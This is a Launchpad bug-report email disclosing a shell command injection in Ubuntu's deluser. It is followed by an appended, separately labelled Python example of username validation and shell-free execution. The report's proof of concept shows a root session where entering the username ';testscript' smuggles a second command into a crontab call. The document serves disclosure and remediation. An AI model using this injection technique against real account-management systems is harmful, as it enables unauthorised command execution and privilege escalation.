Thanks!

** Also affects: adduser (Debian) via
   https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=940577
   Importance: Unknown
       Status: Unknown

** Changed in: adduser (Ubuntu)
       Status: Incomplete => Confirmed

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to adduser in Ubuntu.
https://bugs.launchpad.net/bugs/1838489

Title:
  adduser & deluser shell command injection

Status in adduser package in Ubuntu:
  Confirmed
Status in adduser package in Debian:
  Unknown

Bug description:
  The deluser program is vulnerable to a command injection vulnerability
  when a user is added via adduser with special characters (such as ';').
  It is only possible when the user exists on the system (adduser does not
  prevent usernames with ';' from being added.)

  This can be a security risk when user accounts on the system can be
  created from arbitrary input, and there are exploitable programs in PATH
  to make privilege escalation possible.

  -------------- Proof of concept ----------------

  # ll /test-file
  ls: cannot access '/test-file': No such file or directory
  # cat /usr/bin/testscript
  #!/bin/bash
  touch /test-file
  # deluser
  Enter a user name to remove: ;testscript
  no crontab for root
  crontab: usage error: no arguments permitted after this option
  usage:  crontab [-u user] file
          crontab [ -u user ] [ -i ] { -e | -l | -r }
                  (default operation is replace, per 1003.2)
          -e      (edit user's crontab)
          -l      (list user's crontab)
          -r      (delete user's crontab)
          -i      (prompt before deleting user's crontab)
  /usr/sbin/deluser: `/usr/bin/crontab -r ;testscript' returned error code 1.  Exiting.
  (failed reverse-i-search)`': deluser^C
  # ll /test-file
  -rw------- 1 root root 0 Jul 31 10:25 /test-file

  -------- system description --------

  Description:    Ubuntu 18.04.2 LTS
  Release:        18.04

  # apt-cache policy adduser
  adduser:
    Installed: 3.116ubuntu1
    Candidate: 3.116ubuntu1
    Version table:
   *** 3.116ubuntu1 500
          500 http://mirror.optus.net/ubuntu bionic/main amd64 Packages
          100 /var/lib/dpkg/status

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/adduser/+bug/1838489/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to     : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp
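An added example (not code from adduser or deluser, which are Perl, and not from the report) showing the two defensive measures the report points at: an allow-list check on usernames so a value like ";testscript" is refused before any command runs, and handing the name to crontab as its own argv element instead of interpolating it into a shell string. The regex is modelled on adduser's conventional default NAME_REGEX and is an assumption; the child-process demo uses the current Python interpreter as a stand-in for crontab so it runs offline.

```python
import json
import re
import shlex
import subprocess
import sys
from typing import List

# Assumed allow-list modelled on adduser's default NAME_REGEX: lowercase
# letter first, then lowercase letters, digits, '-' or '_'. It rejects ';'
# and every other shell metacharacter outright.
USERNAME_RE = re.compile(r"^[a-z][-a-z0-9_]*$")


def is_valid_username(name: str) -> bool:
    """Allow-list check: True only for names matching USERNAME_RE."""
    return bool(USERNAME_RE.match(name))


def vulnerable_shell_string(name: str) -> str:
    """The unsafe pattern from the report: the name is pasted into a string
    that a shell will later split on ';' (built here, never executed)."""
    return f"/usr/bin/crontab -r {name}"


def crontab_remove_argv(name: str) -> List[str]:
    """Hardened form: validate, then build an argv list for a shell-free exec.
    Uses crontab's documented '-u user -r' syntax."""
    if not is_valid_username(name):
        raise ValueError(f"refusing unsafe username: {name!r}")
    return ["/usr/bin/crontab", "-u", name, "-r"]


def quote_for_shell(argv: List[str]) -> str:
    """If a shell is unavoidable, quote each element so metacharacters in a
    value stay inside one word instead of terminating the command."""
    return shlex.join(argv)


def argv_received_by_child(user: str) -> List[str]:
    """Demo of argv-list execution (shell=False): the child just reports the
    arguments it got. Even a metacharacter-laden value arrives as ONE
    argument and is never parsed as a command separator."""
    proc = subprocess.run(
        [sys.executable, "-c",
         "import json, sys; print(json.dumps(sys.argv[1:]))", "-r", user],
        capture_output=True, text=True, check=True)
    return json.loads(proc.stdout)
```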